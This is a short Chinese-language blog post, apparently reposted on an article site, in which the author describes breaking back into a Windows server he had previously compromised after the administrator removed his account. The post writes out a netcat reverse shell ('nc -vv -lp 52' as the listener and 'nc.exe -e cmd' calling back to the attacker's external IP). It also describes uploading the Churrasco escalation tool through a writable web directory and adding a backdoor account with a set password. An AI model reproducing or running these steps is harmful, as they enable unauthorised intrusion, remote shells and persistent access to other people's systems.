Windows下NC反弹CMD提权
Windows下NC反弹CMD提权 篇1
上次拿的服务器很久没看了,
这几天忙与学习。
今天上去看下
帐号被删除。。我擦。
这个管理员真是让人 .
于是用用上次方法udf提权。
帐号还是没添加上。。
如图:
经过很多测试不成功。管理员但还是疏忽了ws组建。
呵呵。成功的希望正在前方。。
虽然对mysql语句不精通。
放弃了mysql提权方法。
后来在某个论坛看见cmd反弹shell
呵呵,
有戏了。
灵感来了。找了web目录上传nc和巴西烤肉
web目录都是有写有读的权限。
本机连接
nc -vv -lp 52
服务器连接比如:
D:web c.exe -e cmd上传路径IP(外网IP)52(这里是本机端口)
如图:
反弹上去net user 成功了.
利用巴西烤肉来提权
命令:
1.exe user falling falling /add
就出现了密码不满足密码策略的要求。检查最小密码长度、密码复杂性和密码历
史的要求。
如图:
那就换个密码吧.
net user falling Falling1234 /add
果断的成功
【Windows下NC反弹CMD提权】推荐阅读:
NC反弹CMDSHELL提权总结08-31
Windows下操作05-22
反弹05-21
反弹因素06-07
反弹型模式08-07
反弹琵琶,让幽默妙趣十足美文07-02
Windows Vista下安装SQL Server08-13
Windows系统下安装Python的SSH模块教程06-04
人民日报评论员:坚决防止“四风”反弹06-29